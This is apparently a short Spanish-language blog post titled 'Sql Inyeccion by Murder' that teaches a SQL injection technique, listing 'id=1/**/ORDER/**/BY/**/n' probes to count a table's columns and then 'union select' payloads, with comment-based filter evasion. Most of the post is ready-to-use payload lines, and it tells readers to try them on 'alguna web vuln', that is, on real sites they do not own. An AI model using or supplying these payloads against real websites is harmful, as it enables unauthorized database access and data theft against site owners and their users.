id=1/**/ORDER/**/BY/**/1/*
id=1/**/ORDER/**/BY/**/2/*
id=1/**/ORDER/**/BY/**/3/*
id=1/**/ORDER/**/BY/**/4/*
...
...
...
id=1/**/ORDER/**/BY/**/9/*
Haces eso hasta que te de error y anotas el ultimo numerito que funcionó para en el siguiente paso poner:
id=-1/**/union/**/select/**/1,2,3,4,5,6,7,8,9/**/
En la injection... es sencillo con el order by sacas cuantas columnas tiene la tabla para asi poder hacer el union correctamente. Pruebenlo en alguna web vuln y lo entenderán... si tiene 9 columnas y pongo solo 8 en la inject, dará error..
id=-1/**/union/**/select/**/1,2,3,4,5,6,7,8/**/ -> ERROR
id=-1/**/union/**/select/**/1,2,3,4,5,6,7,8,9/**/ -> correcto
Sql Inyeccion by Murder
Suscribirse a:
Enviar comentarios (Atom)
0 comentarios:
Publicar un comentario